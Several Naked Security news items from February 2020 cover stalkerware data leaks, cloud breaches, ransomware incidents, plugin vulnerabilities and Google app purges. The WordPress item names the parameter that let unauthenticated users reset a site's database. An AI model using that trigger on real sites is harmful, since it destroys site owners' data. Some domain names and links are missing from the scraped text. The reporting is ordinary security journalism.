Repairs & Upgrades

February 24, 2020 »

KidsGuard stalkerware leaks data on secretly surveilled victims

By Lisa Vaas


What an inappropriate name. It should be called KidsStalk-N-Dox, given that the makers of this consumer-grade stalkerware left a server open and unprotected, regurgitating the private data it slurped up from thousands of victims’ devices after a parent or other surveillance-happy person stealthily installed it.

The spyware app’s unprotected Alibaba cloud storage bucket was found by Till Kottmann. He’s a developer who reverse-engineers apps to see how they tick (or leak, in this case). Kottmann shared a copy of the Android version of KidsGuard with TechCrunch, which first reported on the data breach on Thursday.

Kottmann’s findings amount to “Goodness, Grandma, what enormous bites you take out of victims’ privacy with those big, keyloggy teeth of yours.”

this is sick

Till Kottmann (@deletescape) February 16, 2020

KidsGuard comes from a company called ClevGuard that promises that its “excellent products” will deliver “all the information” from a targeted device, including real-time location, text messages, browser history, photos, videos, recordings of phone calls, keylogger data for every keystroke entered and the app where it came from, and all the data from all the social apps – hopping over the end-to-end encryption of, for example, WhatsApp.


Google purges 600 Android apps for “disruptive” pop-up ads

By Lisa Vaas

You know those ads that obscure your whole screen when you’re trying to make a phone call, unlock your device or use your phone’s GPS?

Technically, they’re called disruptive or out-of-app ads, and they maddeningly pop up outside of the app that hosts them, sometimes causing users to mistakenly click them, thereby frustrating users and wasting advertisers’ money.

On Thursday, Google kicked nearly 600 of the offending apps off its Play store and banned them from its ad monetization platforms, Google AdMob and Google Ad Manager, for violating its disruptive ads policy and disallowed interstitial policy.

Disruptive ads are those that come at you in unexpected ways, including by getting in the way of a device’s functions. While they do occur in-app, Google has recently seen a rise in what it calls “out-of-context ads” – those created by malicious developers who program them to pop up when the user isn’t actually active in their app.

Per Bjorke, Google’s senior product manager for ad traffic quality, said in a Google security blog post that the developers behind these apps keep coming up with ways to deploy them and mask what they’re up to. But Google has been working on technology to detect them, and it’s led to Thursday’s purge:

We recently developed an innovative machine-learning based approach to detect when apps show out-of-context ads, which led to the enforcement we’re announcing today.

Also on Thursday, Google detailed a three-step plan to keep the Play Store and Android ad ecosystem from getting polluted by disruptive ads and other challenges.

One of those steps is doubling down on protecting advertisers from invalid traffic like that coming from disruptive, out-of-app ads. Sweeping the Play store of such apps on Thursday is one example, Google said, given that its investigations are ongoing and it plans to keep taking action against this kind of abuse.


Apple chops Safari’s TLS certificate validity down to one year

By John E Dunn

Barely noticed by web users, the life expectancy of SSL/TLS certificates has lowered dramatically over the last decade.

Used as the foundation of HTTPS authentication, just over a decade ago domain registrars were selling SSL/TLS certificates that were valid for between 8 and 10 years.

In 2011, a new body called the Certification Authority Browser Forum (CA/Browser Forum), which included all the big browser makers, decided this was too long and imposed a limit of five years.

Then, in 2015 the time limit was dropped to three years, followed by a further drop in 2018 to only two years.

How low could this go?

This week, we learned that the latest answer is one year, or 398 days including the renewal grace period, a change that will apply from 1 September 2020.

What makes this new limit noteworthy, however, is that it was reportedly announced at a CA/Browser Forum meeting by a single member, Apple, in relation to one browser, Safari.

Although not yet officially confirmed, it’s a bold move that presumably prefigures similar announcements by other big browser makers, especially Google, which has assiduously promoted the idea of a one-year limit in recent CA/Browser Forum ballots.

That browser makers were voted down might explain why Apple has decided to enforce the change unilaterally, apparently against the wishes of the Certificate Authorities (CAs) which issue certificates as a business.

The browser makers are adamant that reducing validity is good for security because it reduces the time period in which compromised or bogus certificates can be exploited.

In theory, it also makes it less likely that in future, certificates using retired encryption (certificates based on SHA-1 being a prime example) will be able to soldier on when everyone knows they are vulnerable.


The Amazon Prime phishing attack that wasn’t…

By Paul Ducklin

Earlier this week, we received a moderately believable Amazon Prime phish via email.

The scam had an Account Locked subject line, with a warning that we wouldn’t be able to buy or sell anything via Amazon’s services until we verified our account.

To add a bit more fear and urgency, the crooks went on to warn us that if we didn’t complete the verification process within 24 hours, then our account would be deactivated, not merely suspended.

The “good” news, of course, is that verifying our account was as easy as clicking a link in the email:

Your Prime Membership Account Has Been Suspended Due To The Following Problems Below:

Invalid Card Number

Your Billing Address Does Not Match Our Records

Unverified Email Address

You will not be able to Buy and Sell on amazon until you have click the link below to confirm your account details before 24hrs of receiving this message.

We will be forced to deactivate your account automatically if you do not verify your identity.

We don’t think that Naked Security readers would fall for this one, for several reasons.


Data of 10.6m MGM hotel guests posted for sale on Dark Web forum

By Lisa Vaas

The personal data of 10,683,188 MGM hotel guests that leaked sometime in or before 2017 was posted for sale on the Dark Web this week, ZDNet reports.

It doesn’t matter that the data isn’t freshly baked: it’s still edible. ZDNet called hotel guests whose details were included in the data dump and found that, while some of the phone numbers had been disconnected, many were still valid, as “the right person answered the phone.”

The data was first spotted by an Israeli security researcher calling themselves Under the Breach who claims to have “deep relations” with various threat actors that gives them “pre-breach information on many publicly traded companies.”

Under the Breach says they spotted some Vegas-big names among the leaked guest records, including Twitter CEO Jack Dorsey, pop star Justin Bieber, and government officials from the Department of Homeland Security (DHS) and the Transportation Security Administration (TSA).

Under the Breach came across the leaked files on an online forum commonly used by hackers, they told Business Insider. The researcher said that they’d cross-referenced the information with publicly available data and emails that had been exposed in previous breaches.

A spokesperson for MGM Resorts confirmed the security breach, saying that the data is old. The dump included full names, addresses, phone numbers, emails and birthdays, but MGM says that no payment information was compromised. The hotel chain hasn’t confirmed the identity of any of the affected guests; nor has Twitter commented on whether or not Dorsey’s information was involved.

ZDNet confirmed the authenticity of the data on Wednesday. None of the hotel guests whom the news outlet contacted had stayed at the hotel more recently than 2017. But regardless of how long ago the initial breach happened, the personally identifiable information (PII) is still valuable for use in spearphishing campaigns or in SIM-swap attacks, as Under the Breach told ZDNet.


Adobe fixes critical flaws in Media Encoder and After Effects

By John E Dunn

After fixing a fat pile of critical security flaws as part of last week’s Patch Tuesday update, Adobe has come back with two more that need urgent attention.

This is what’s called an out of band update, which means that a vulnerability is too risky or likely to be exploited to leave to the next scheduled update.

The first is in the Windows and macOS versions of the After Effects graphics software and affects anyone running version 16.1.2 and earlier.

Identified as CVE-2020-3765 after being reported to Adobe only days ago, the company offers little detail on the vulnerability itself beyond stating that the update:

Resolves a critical out-of-bounds write vulnerability that could lead to arbitrary code execution in the context of the current user.

Assuming that this flaw can be triggered merely by opening a booby-trapped data file – for example, by opening an email attachment or downloading a file from a poisoned website – you should apply the patch as soon as you can.

The second is also an out-of-bounds write weakness, this time in Adobe Media Encoder, affecting Windows and macOS versions 14.02. Identified as CVE-2020-3764, this requires similar current user access.

There is no evidence that either of these flaws is being exploited in the wild, but you never know, hence the need to patch now.


ISS World “malware attack” leaves employees offline

By Paul Ducklin

Global facilities company ISS World, headquartered in Denmark, has shuttered most of its computer systems worldwide after suffering what it describes as a “security incident impacting parts of the IT environment.”

The company’s website currently shows a holding page, with no clickable links on it:

On 17 February 2020, ISS was the target of a malware attack. As a precautionary measure and as part of our standard operating procedure, we immediately disabled access to shared IT services across our sites and countries, which ensured the isolation of the incident.

The root cause has been identified and we are working with forensic experts, our hosting provider and a special external task force to gradually restore our IT systems. Certain systems have already been restored. There is no indication that any customer data has been compromised.

Some media outlets – for example, the BBC – have mentioned ransomware prominently in their coverage of the issue, perhaps because of the suddenness of the story, but at the moment we simply don’t know what sort of malware was involved.

As you can imagine, facilities companies that provide services such as cleaning and catering rely heavily on IT systems for managing their operations.

But one silver lining for ISS World is that many, perhaps most, of its staff don’t rely on computers to carry out their hour-by-hour work, and most staff work on customer sites:

The nature of our business is to deliver services on customer sites mainly through our people and as such we continue our service delivery to customers while implementing our business continuity plans. Our priority is to ensure limited or no disruption while we fully restore all systems.

Nevertheless, a report in the UK claims that 43,000 staff worldwide, including 4000 in the UK, don’t have access to email, a serious operational blow to any modern business.

ISS World has promised, via its one-page, static website, that it is “currently estimating when IT systems will be fully restored and are assessing any potential financial impact”, and that it will “provide a further update when we have significant, additional information.”


Ransomware attack forces 2-day shutdown of natural gas pipeline

By Lisa Vaas

The US Department of Homeland Security (DHS) on Tuesday said that an infection by an unidentified ransomware strain forced the shutdown of a natural-gas pipeline for two days.

Fortunately, nothing blew up. The attacker never got control of the facility’s operations, the human-machine interfaces (HMIs) that read and control the facility’s operations were successfully yanked offline, and a geographically separate central control was able to keep an eye on operations, though it wasn’t instrumental in controlling them.

Where this all went down is a mystery.

The alert, issued by DHS’s Cybersecurity and Infrastructure Security Agency (CISA), didn’t say where the affected natural gas compression facility is located. It instead stuck to summarizing the attack and provided technical guidance for other critical infrastructure operators so they can gird themselves against similar attacks.

The alert did get fairly specific with the infection vector, though: whoever the attacker was, they launched a successful spearphishing attack, which enabled them to gain initial access to the facility’s IT network before pivoting to its operational technology (OT) network.

OT networks are where hardware and software for monitoring and/or controlling physical devices, processes and events reside. Some examples are SCADA industrial control systems, programmable logic controllers (PLCs), and HMIs.

After the attacker(s) got their hands on both the IT and OT networks, they deployed what CISA called “commodity” ransomware, encrypting data on both networks. Staff lost access to HMIs, data historians and polling servers. Data historians – sometimes referred to as process or operational historians – are used in several industries, and they do what you might expect: record and retrieve production and process data by time and store the information in a time series database.


Nearly half of hospital Windows systems still vulnerable to RDP bugs

By Danny Bradbury

Almost half of connected hospital devices are still exposed to the wormable BlueKeep Windows flaw nearly a year after it was announced, according to a report released this week.

The report, called 2020 Vision: A Review of Major IT & Cyber Security Issues Affecting Healthcare, comes from CyberMDX, which provides cybersecurity systems for hospitals.

It says that 22% of a typical hospital’s Windows devices are exposed to BlueKeep. The proportion of Windows devices connected to a network that are vulnerable is far higher, at 45%, it adds.

CyberMDX gathers these kinds of metrics via its own platform, which tells it about the machines it’s protecting in the field. It told us that it has analyzed a little over a million data points collected from machines across hundreds of facilities.

The BlueKeep bug, first reported in May 2019, is wormable, meaning that an attacker can trigger it without human interaction. An exploit could spread by sending malicious packets via the Remote Desktop Protocol (RDP) to Microsoft’s Remote Desktop Service (RDS).

It affected Windows 7 and Windows Server 2008, and Microsoft issued patches when it first reported the bug. However, as with many patches, it has taken companies a long time to apply, and there is a ‘long tail’ of machines still online and vulnerable.

The problem doesn’t just lie with BlueKeep. According to the CyberMDX report, 25% of connected devices in hospitals are also exposed to another flaw: DejaBlue.

News of DejaBlue surfaced in August when Microsoft patched another two RDP bugs, this time affecting versions of Windows up to and including Windows 10. These bugs, CVE-2019-1181 and 1182, are also wormable.

Like BlueKeep, the bug was exploitable using a maliciously crafted RDP message. The saving grace for some users is the use of Network Level Authentication (NLA), which when turned on requires authentication before an attacker can trigger an exploit. However, if the attacker has valid credentials, they could still mount the attack.


February 19, 2020 »

Private photos leaked by PhotoSquared’s unsecured cloud storage

By Lisa Vaas

No, likely not. No thanks to the leaky photo app they dribbled out of for that, though. After coming across thousands of photos seeping out of an unsecured S3 storage bucket belonging to a photo app called PhotoSquared, security researchers at vpnMentor blurred a few.

They also blurred a sample from a host of other personally identifiable information (PII) they came across during their ongoing web mapping project, which has led to the discovery of a steady stream of databases that have lacked even the most basic of security measures.

In this case, as they wrote up in a report published this week, the researchers came across photos uploaded to the app for editing and printing; PDF orders and receipts; US Postal Service shipping labels for delivery of printed photos; and users’ full names, home/delivery addresses and the order value in USD.

PhotoSquared, a US-based app available on iOS and Android, is small but popular: it has over 100,000 customer entries just in the database that the researchers stumbled upon.

Customer impact and legal ramifications

vpnMentor suggested that PhotoSquared might find itself in legal hot water over this breach. vpnMentor’s Noam Rotem and Ran Locar note that PhotoSquared’s failure to lock down its cloud storage has put customers at risk of identity theft, financial or credit card fraud, malware attacks, or phishing campaigns launched with the USPS or PhotoSquared postage data arming phishers with the PII they need to sound all that much more convincing.


Facebook asks to be regulated kinda like a newspaper, kinda like telco

By Lisa Vaas

The EU has been itching to regulate the internet, and that’s where Facebook has been this week: in Germany, asking to be regulated, but in a new, bespoke manner.

In fact, CEO Mark Zuckerberg is in Brussels right on time for the European Commission’s release of its manifesto on regulating AI – a manifesto due to be published on Wednesday that’s likely going to include risk-based rules wrapped around AI.

Don’t regulate us like the telco-as-dumb-pipe model, Zuckerberg proposed on Saturday, even though that’s once how he wanted us all to view the platform: as just a technology platform that dished up trash without actually being responsible for creating it.

No, not like a telco, but not like the newspaper model, either, he said.

Nobody ever really swallowed what Facebook once offered as a magic pill to try to ward off culpability for what it publishes – as in, that “we’re just a technology platform” mantra. Facebook gave up trying to hide behind that one long ago, somewhere amongst the outrage sparked by extremist content, fake news and misleading political advertising.

So now, Facebook has taken a different tack. During a Q&A session at the Munich Security Conference on Saturday, Zuckerberg admitted that Facebook isn’t the passive set of telco pipes he once insisted it was, but nor is it like a regular media outlet that produces news. Rather, it’s a hybrid, he said, and should be treated as such.

Reuters quoted Zuckerberg’s remarks as he spoke to global leaders and security chiefs, suggesting that regulators treat Facebook like something between a newspaper and a telco:

I do think that there should be regulation on harmful content …there’s a question about which framework you use for this.

Right now there are two frameworks that I think people have for existing industries – there’s like newspapers and existing media, and then there’s the telco-type model, which is ‘the data just flows through you’, but you’re not going to hold a telco responsible if someone says something harmful on a phone line.

I actually think where we should be is somewhere in between.

Zuckerberg says that following the 2016 US presidential election tampering, Facebook has gotten “pretty successful” at sniffing out not just hacking, but coordinated information campaigns that are increasingly going to be a part of the landscape. One piece of that is building AI that can identify fake accounts and network accounts that aren’t behaving in the way that people would, he said.

In the past year, Facebook took down around 50 coordinated information operations, including in the last couple of weeks, he said. In October 2019, it pulled fake news networks linked to Russia and Iran.


WordPress plugin hole could have allowed attackers to wipe websites

By Danny Bradbury

A WordPress plugin with over 100,000 active installations had a hole which could have allowed unauthorized attackers to wipe its users’ blogs clean, it emerged this week.

ThemeGrill is a WordPress theme developer that publishes its own Demo Importer plugin. As the name suggests, it imports demo content, widgets, and theme settings. By importing this data with a single button click, it makes demo content easy for non-technical users to import, giving them fully configured themes populated with example posts. Unfortunately, it also makes it possible for unauthenticated users to wipe a WordPress site’s entire database to its default state and then log in as admin, according to a post from web application security vendor WebARX.

The vulnerability has existed for roughly three years in versions 1.3.4 through 1.6.1, said the security company, and affects sites using the plugin that also have a ThemeGrill theme installed and activated.

The problem lies with an authentication bug in code introduced by class-demo-importer.php, a PHP file that loads a lot of the Demo Importer functionality. That file adds a code hook into admin_init, which is code that runs on any admin page.

The hook added into admin_init enables someone who isn’t logged into the site to trigger a database reset, dropping all the tables. All that’s needed to trigger the wipe is the inclusion of a do_reset_wordpress parameter in the URL on any admin-based WordPress page.

Unfortunately for site admins, one of those admin-based WordPress pages is /wp-admin/admin-ajax.php. This page, which loads the WordPress Core, doesn’t need a user to be authenticated when it loads, WebARX explains.


OpenSSH eases admin hassles with FIDO U2F token support

By John E Dunn

OpenSSH version 8.2 is out and the big news is that the world’s most popular remote management software now supports authentication using any FIDO (Fast Identity Online) U2F hardware token.

SSH offers a range of advanced security features but it is still vulnerable to brute force attacks that try large numbers of passphrases until they hit upon the right one.

One way to counter this is passwordless login using cryptographic keys, but these are normally stored on a local drive or in the cloud. That makes them vulnerable to misuse and creates some management overhead.

A more secure alternative is to put them on a USB or NFC hardware token such as a YubiKey that ties a generated private key to that device. This means that authentication can’t happen without the token being present as well as requiring a physical finger tap by an admin.

However, it seems that getting U2F tokens to work with SSH has required support for the Personal Identity Verification (PIV) card interface, which only the most recent and expensive tokens offer.


February 18, 2020 »

AI filter launched to block Twitter cyberflashing

By John E Dunn

It seems strange to report, yet a small but determined group of Twitter users think it is a good idea to direct message (DM) pictures of male genitals to complete strangers.

Does this sound a bit like street flashing harassment in digital form?

It did to developer Kelsey Bressler after she received such an unsolicited image as a DM via Twitter last August. She later told the BBC:

You’re not giving them a chance to consent, you are forcing the image on them, and that is never okay.

Instead of shrugging it off, she and a friend had the idea of using AI pattern recognition to screen the pictures out before they were seen. But that AI still needed a set of – ahem – images to train itself on, which Bressler requested via Twitter.

Bressler has reportedly received over 4,000 pictures in response – enough to train the system to a state where it has just been released as a Safe DM service that anyone can sign up for.

Media site Buzzfeed tested Safe DM against a selection of images taken from Wikimedia Commons and found that it works well, albeit with a lag of a few minutes.

In tests, the filter blocked penises in a range of states, including full body shots and condoms and drawings. It even blocked examples that looked like a penis without being one.


IOTA shuts down network temporarily to fight wallet hacker

By Danny Bradbury

Popular cryptocurrency IOTA has temporarily shut down its entire network after a hacker stole funds from ten of its highest-value users.

IOTA is a cryptocurrency that uses an alternative to the conventional blockchain technology seen in assets like Bitcoin. Called tangle, it’s a ‘blockless’ network that the development team created with vast connected networks of small-footprint connected machines (the internet of things) in mind. Its advantages include fast verification of transactions and no transaction fees. However, for this network to operate effectively, it needs a system called the Coordinator to protect the network when the transaction volume is low.

On Wednesday 12 February, IOTA published a status update, explaining:

Currently the Coordinator is halted until further notice to investigate reported issues with stolen funds. We ask you to keep the Trinity wallet closed for now until further notice.

In a series of further updates, the team explained that the problem lay in a third-party integration with the desktop version of Trinity, a wallet that the company released in July 2019. The vulnerability apparently allowed an attacker to steal users’ seeds – digital keys that provide access to the wallet’s funds. The IOTA team published an updated version on Sunday to fix the problem.

The attacker had hit ten people that the IOTA team said were high-value clients, and may have intended to work their way down to clients with fewer funds, it said.


Council returns to using pen and paper after cyberattack

By John E Dunn

Ten days after a suspected ransomware attack, residents of the English borough of Redcar and Cleveland must be starting to wonder when their Council’s IT systems will return.

The first public sign of trouble appeared on the morning of Saturday, February 8, when the following message appeared on the Council’s website:

The requested service is temporarily unavailable. It is either overloaded or under maintenance. Please try later.

The Council later confirmed that it had been hit with a cyberattack affecting its internal and external-facing IT systems, with the notable exception of property tax payments.

The Council is back to working from pen and paper and able to field only urgent emails and telephone enquiries. Council leader, Councilor Mary Lanigan, told the BBC:

Computers have been taken offline and systems are being rebuilt. We have a massive team here – including cyber-security experts – working around the clock flat out to get it fixed.

The Council hasn’t explained the nature of the cyberattack, but it’s quite possible that this is yet another ransomware attack of a type that has become a huge problem across the world. The UK’s National Cyber Security Centre (NCSC) has confirmed it is assisting the Council.

This is happening over and over again. In January, it was schools in California, in November it was a company managing 110 nursing homes in the US, and in September the city of New Bedford in Massachusetts – the latest in a long line of US cities hit by the plague of hijacking networks for money.


Sensitive plastic surgery images exposed online

By Danny Bradbury

Researchers at VPN advisory company vpnMentor have found yet another online data exposure caused by a misconfigured cloud database. This time, the culprit was the French plastic surgery technology company NextMotion.

Established in 2015, NextMotion sells digital photography and video devices for dermatology clinics, concentrating on images including those that document the effects of treatment. Its proprietary software includes facial analysis and augmented reality tools, and also documents treatment plants, digital consent forms, treatment reports, quotes, and invoices. It reports selling its services to over 170 clinics in 35 countries. It has received investments of €1.58m, a million of which it raised last year in a single round.

The images are the contentious part here. According to a team led by vpnMentor researchers Noam Rotem and Ran Locar, NextMotion’s compromised database contained sensitive images of thousands of plastic surgery patients, uploaded via its devices and software.

There were almost 900,000 images in an Amazon Web Services S3 bucket, showing patients’ faces along with the parts of their bodies that had been treated. These images were often highly sensitive, showing patients’ genitalia and other body parts.

The French company was quick to clarify what hadn’t been exposed. In a press release on its site, it said:

These media are stored in a specific database separated from the patients’ personal data database (names, birth dates, notes, etc) – only the media database was exposed, not the patients’ database.


February 17, 2020 »

Senator calls for dedicated US data protection agency

By Danny Bradbury

The US needs a data protection agency of its own, and Kirsten Gillibrand wants to be the one that makes it happen.

Gillibrand, the US senator for New York, released the call to action last week. She announced draft legislation known as the Data Protection Act on Thursday 13 February, a day after explaining her reasoning in a post on Medium. We need to do this to catch up, she said:

The United States is vastly behind other countries on this. Virtually every other advanced economy has established an independent agency to address data protection challenges, and many other challenges of the digital age.

At the moment, the US doesn’t have a single body dedicated to enforcing privacy rules. It’s a side-mission at the Federal Trade Commission (FTC), which is limited in its approach.

Under Section 5 of the FTC Act, it can’t issue fines for privacy violations immediately. Instead, it has to issue a consent decree (the violator has to agree that it won’t be naughty again) and it can only fine a company if it violates that decree. That’s why it didn’t fine Facebook for privacy infractions in 2011 but did levy a $5bn fine last year.

In any case, the FTC doesn’t just focus on privacy. Gillibrand wants a federal data agency dedicated to the task with three core missions.

The first would give Americans control over their own data by enforcing data protection rules. The key word here is ‘enforcing’ – it would be able to not just conduct investigations and share its findings, but to impose civil penalties. These would be capped at $1m for each day that an organization knowingly violates the Act. This money would go into a relief fund that the Agency would use to help compensate victims of data privacy violations.

The second mission would be to promote privacy innovations, including technologies that minimize the collection of personal data or eliminate it altogether. Under this mission, Gillibrand would also come down hard on service contracts that gave customers no choice but to give up their privacy. She also says that she’d protect against “pay for privacy” provisions in service contracts.


Police bust alleged operator of Bitcoin mixing service Helix

By Lisa Vaas

The guy who allegedly wanted to be the Dark Net’s “go-to” money launderer by acting as a “Bitcoin mixer” – soliciting cryptocurrency from crooks, slicing and dicing the coins, and then remixing them in an ultimately futile attempt to obscure their source – has been busted.

The US Department of Justice (DOJ) announced on Thursday that Larry Harmon, 36, of Akron, Ohio, has been indicted on three counts of allegedly running a Bitcoin mixer service called Helix from 2014 to 2017.

These services are also called Bitcoin tumblers, which is how Harmon allegedly referred to Helix in his sales pitch to the underworld. This is how the indictment summarizes Harmon’s alleged first post about his service in June 2014 – a pitch to convince criminals to pay him to hide their transactions from law enforcement:

Before launching Helix. HARMON posted online that Helix was designed to be a ‘bitcoin tumbler’ that ‘cleans’ bitcoins by providing customers with new bitcoins ‘which have never been to the darknet before.’

Harmon allegedly went on to promise that there was no way that law enforcement could tell which addresses are Helix addresses, given that the service uses new addresses for each transaction. His alleged “I’ll-scare-you-crooks-into-paying” follow-up advertising spiel:

No one has ever been arrested just through bitcoin taint, but it is possible and do you want to be the first? …Most markets use ‘Hot Wallets’, they put all their fees in these wallets. [Law enforcement] just needs to check the taints on these wallets to find all the addresses a market uses.

In short, “taints” are the trail left by bitcoins as they travel from wallet to wallet. Here’s a discussion about traceability from Stack Exchange.

Harmon’s Helix bitcoin mixer allegedly moved at least 354,468 bitcoin on behalf of customers: a sum that was valued at over $300 million at the time of the transactions and which is now worth about USD $3.6 billion. Most of those customers came in from Dark Net markets. Helix had partnered with AlphaBay – one of the largest Dark Net markets before law enforcement seized it in July 2017 – to provide bitcoin laundering for AlphaBay’s customers.


Bluetooth bugs – researchers find 10 “Sweyntooth” security holes

By Paul Ducklin

A trio of researchers from Singapore just published a paper detailing a number of security holes they discovered in Bluetooth chips from several different vendors.

The good news is that they disclosed the holes responsibly back in 2019 and waited 90 days – a sort-of industry standard period popularized by Google’s Project Zero team – before releasing the paper.

The bad news is that not all of the affected devices have received patches yet, and even for chips where the vendor has provided new firmware, it’s hard to be sure:

  • Which products out in the market use those chips.
  • Which products that could have been patched have actually received updates.
  • Which products might be affected but don’t support patching at all.

The researchers name seven different Bluetooth chip manufacturers as having buggy chips, though they insist that their list is “By no means […] exhaustive in terms of being affected.”

We assume they’re saying that out of a sense of fairness to the vendors they did name, which just happen to be the major Bluetooth chip makers whose chips appeared in the products they tried.

In other words, they’re not claiming that they tested a long list of chips and found all the other vendors to be safer, or suggesting that by avoiding the named vendors you’ll immediately be more secure.

The researchers also say that they were quickly able to find about 480 different products using the affected Bluetooth chips they’d identified, including fitness trackers, digital locks, remotely controllable plugs and more.


Google pulls 500 malicious Chrome extensions after researcher tip-off

By John E Dunn

Google has abruptly pulled over 500 Chrome extensions from its Web Store that researchers discovered were stealing browsing data and executing click fraud and malvertising after installing themselves on the computers of millions of users.

Depending on which way you look at it, that’s either a good result because they’re no longer free to infect users, or an example of how easy it is for malicious extensions to sneak on the Web Store and stay there for years without Google noticing.

That they were noticed at all is thanks to researcher Jamila Kaya who used Duo Security’s CRXcavator tool (also available at to spot a handful of extensions that seemed suspicious, mostly themed around marketing and advertising.

Spotting dodgy extensions was only the start – she still had to connect them to one another to uncover recurring patterns that might highlight other offenders.

The first giveaway was that the extension code often looked like copycats of one another despite small changes to the names of internal functions designed to obscure this.

Another troubling similarity was the number of permissions requested. Enough to allow them to access browsing data and run when visiting websites using HTTPS.

Working with Duo Security, they eventually identified 70 extensions that seemed to be related to one another. All also contacted similar command and control networks and seemed to have been designed to detect and counteract sandbox analysis.

Ad fraud was the biggest activity – contacting domains without the user being aware – as well as redirecting users to malware and phishing domains.


Google forced to reveal anonymous reviewer’s details

By Danny Bradbury

It’s a small business’s worst nightmare: someone leaves a review on a popular site trashing your company, and they do it anonymously. That’s what happened to Mark Kabbabe, who runs a tooth whitening business in Melbourne, Australia. Last week, a court forced Google to reveal the details of an anonymous poster who published a bad review of his business.

According to the court judgement, the anonymous poster used the pseudonym CBsm 23 to publish a review on Google about a procedure they had undergone at Kabbabe’s clinic. The review said that the dentist made the whole experience “extremely awkward and uncomfortable”, claiming that the procedure was a “complete waste of time” and was not “done properly”. It seemed like Kabbabe “had never done this before”, said the review, adding that other patients had “been warned!” and should “STAY AWAY”. Ouch.

Kabbabe contacted Google in November 2019, according to the court order, asking it to take down the review, but Google refused. He mailed again on 5 February, asking for information about the poster, but Google replied that:

We do not have any means to investigate where and when the ID was created.

This was enough for Justice Murphy, presiding over the case, who has ordered that Google hand over the anonymous poster’s details. In his court ruling, he said:

Dr Kabbabe is not required to make inquiries that will be fruitless and in my view he has done enough.

He added:

…notwithstanding Google’s response, I consider that Google is likely to have or have had control of a document or thing that would help ascertain that description of the prospective respondent CBsm 23…


February 14, 2020 »

Cookie-nabbing app could have served users side helping of XSS

By Danny Bradbury

A popular GDPR compliance WordPress plugin vendor has patched a flaw that rendered both site visitors and admins vulnerable to cookie-stealing cross-site scripting (XSS) attacks.

The GDPR Cookie Consent plugin, created by WebToffee, claims over 700,000 users. The plug-in is a notification app that begs you to accept cookies when you first visit a WordPress site. Website owners use tools like this to stay compliant with GDPR, which points to cookies as a form of online identifier and therefore subject to its consent rules.

While the GDPR Cookie Consent plugin asks you if you’d mind accepting cookies, it doesn’t ask you if you’d like a dollop of XSS with them too. Until this week, that’s what visitors to pages containing the plugin might have been vulnerable to.

The flaw, enabled an XSS attack and elevation of privilege in versions 1.82 and earlier, said a blog post by The Ninja Technologies Network, which sells web application firewalls to protect WordPress sites.

According to Wordfence, the cause of the vulnerability was an AJAX endpoint used in the administration section of the plugin (AJAX uses JavaScript and XML to deliver web page functionality). This exposes three functions to blog subscribers that should only have been available to admins: get_policy_pageid, autosave_contant_data(“contant” is a typo in the code itself), and save_contentdata. The first just returns a post ID for the plugin’s cookie policy page and isn’t really significant, Wordfence said.

The second defines the standard content for that page and is more worrisome. Because the HTML is unfiltered, an attacker could alter it to contain JavaScript code. That means they could use it to deliver an XSS payload to any user that viewed it on its /cli-policy-preview/ page.


Suspect who refused to decrypt hard drives released after four years

By John E Dunn

The contentious case of a man held in custody since 2015 for refusing to decrypt two hard drives appears to have reached a resolution of sorts after the US Court of Appeals ordered his release.

Former Philadelphia police sergeant Francis Rawls was arrested in September 2015, during which the external hard drives were seized along with other computers from his home.

Based on forensic analysis of his download habits and the testimony of his sister, the police believe they contained child abuse imagery but were unable to prove that without access to the drives.

Rawls claimed he did not know or had forgotten the passcodes while his lawyers argued that on principle forcing him to reveal these violated his Fifth Amendment right against self-incrimination.

Ruled in civil contempt of court, in 2017 a second court rejected the Fifth Amendment argument.

Never formally charged with a crime, a lot seems to have hinged on whether Rawls should be treated as a suspect or a witness. If Rawls was considered a witness, the fact that he’s being asked to provide information that could be used against himself, is, in effect, self-incriminating testimony.


Facebook ices in-app dating in EU after questions from regulator

By Lisa Vaas

Facebook has delayed the rollout of its new dating feature in Europe, following officers from the Irish data regulator having popped by to ask why Facebook hadn’t checked in about it earlier or provided the necessary data privacy paperwork.

The Irish Data Protection Commission (DPC) said on Wednesday that Facebook Ireland hadn’t bothered to contact the DPC about its intention to roll out the new dating feature in the EU until Monday, 3 February. That’s not much time, the DPC said, given that this is the first we’ve heard about it, and given that Facebook planned to roll it out just 10 days later.

We were very concerned that this was the first that we’d heard from Facebook Ireland about this new feature […]. Our concerns were further compounded by the fact that no information/documentation was provided to us on 3 February in relation to the Data Protection Impact Assessment [DPIA] or the decision-making processes that were undertaken by Facebook Ireland.

Facebook first started talking about invading Tinder’s space with a dating feature for meeting non-friends back in May 2018 at its F8 developer conference. Then, it launched the in-app dating feature – called Facebook Dating – in September 2019 in the US, after having previously premiered it in 19 other countries, including Colombia, Canada, and Thailand.


Self-driving car dataset missing labels for pedestrians, cyclists

By Lisa Vaas

A popular self-driving car dataset for training machine-learning systems – one that’s used by thousands of students to build an open-source self-driving car – contains critical errors and omissions, including missing labels for hundreds of images of bicyclists and pedestrians.

Machine learning models are only as good as the data on which they’re trained. But when researchers at Roboflow, a firm that writes boilerplate computer vision code, hand-checked the 15,000 images in Udacity Dataset 2, they found problems with 4,986 – that’s 33% – of those images.

From a writeup of Roboflow’s findings, which were published by founder Brad Dwyer on Tuesday:

Amongst these [problematic data] were thousands of unlabeled vehicles, hundreds of unlabeled pedestrians, and dozens of unlabeled cyclists. We also found many instances of phantom annotations, duplicated bounding boxes, and drastically oversized bounding boxes.

Perhaps most egregiously, 217 (1.4%) of the images were completely unlabeled but actually contained cars, trucks, street lights, and/or pedestrians.

Junk in, junk out. In the case of the AI behind self-driving cars, junk data could literally lead to deaths. This is how Dwyer describes how bad/unlabeled data propagates through a machine learning system:

Generally speaking, machine learning models learn by example. You give it a photo, it makes a prediction, and then you nudge it a little bit in the direction that would have made its prediction more ‘right’. Where ‘right’ is defined as the ‘ground truth’, which is what your training data is.

If your training data’s ground truth is wrong, your model still happily learns from it, it’s just learning the wrong things (eg ‘that blob of pixels is *not* a cyclist’ vs ‘that blob of pixels *is* a cyclist’)

Neural networks do an Ok job of performing well despite *some* errors in their training data, but when 1/3 of the ground truth images have issues it’s definitely going to degrade performance.

Read more at is up for sale – check your Active Directory settings!

By Danny Bradbury

An old domain that has lain dormant for 26 years is going on sale – and the results could be catastrophic for enterprises with poorly configured Active Directory setups.

Brian Krebs reports that Mike O’Connor, a domain prospector who registered in 1994, wants to sell the domain for $1.7 million as he simplifies his estate. Most other domains would simply be a useful way to generate web traffic, but is different.

